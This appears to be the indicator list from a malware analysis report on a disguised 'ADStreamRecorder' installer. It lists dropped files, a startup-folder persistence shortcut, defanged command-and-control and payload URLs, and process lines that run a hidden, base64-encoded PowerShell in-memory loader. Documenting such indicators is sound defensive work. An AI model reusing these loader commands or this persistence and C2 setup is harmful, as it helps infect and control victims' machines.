Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\vista.ini.lnk
- %APPDATA%\adstreamrecorder47.exe
- %APPDATA%\for.js
- %TEMP%\is-opunr.tmp\adstreamrecorder47.tmp
- %TEMP%\is-434ir.tmp\_isetup\_setup64.tmp
- %TEMP%\is-434ir.tmp\_isetup\_isdecmp.dll
- %HOMEPATH%\appdata\vista.js
- http://ip##fo.io/ip
- http://ip##fo.io/country
- http://ne##rim.top/bit/R.mp3
- http://ne##rim.top/gate.php
- DNS ASK ne##rim.top
- DNS ASK ip##fo.io
- '%APPDATA%\adstreamrecorder47.exe'
- '%TEMP%\is-opunr.tmp\adstreamrecorder47.tmp' /SL5="$70232,1604204,57856,%APPDATA%\ADStreamRecorder47.exe"
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\for.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...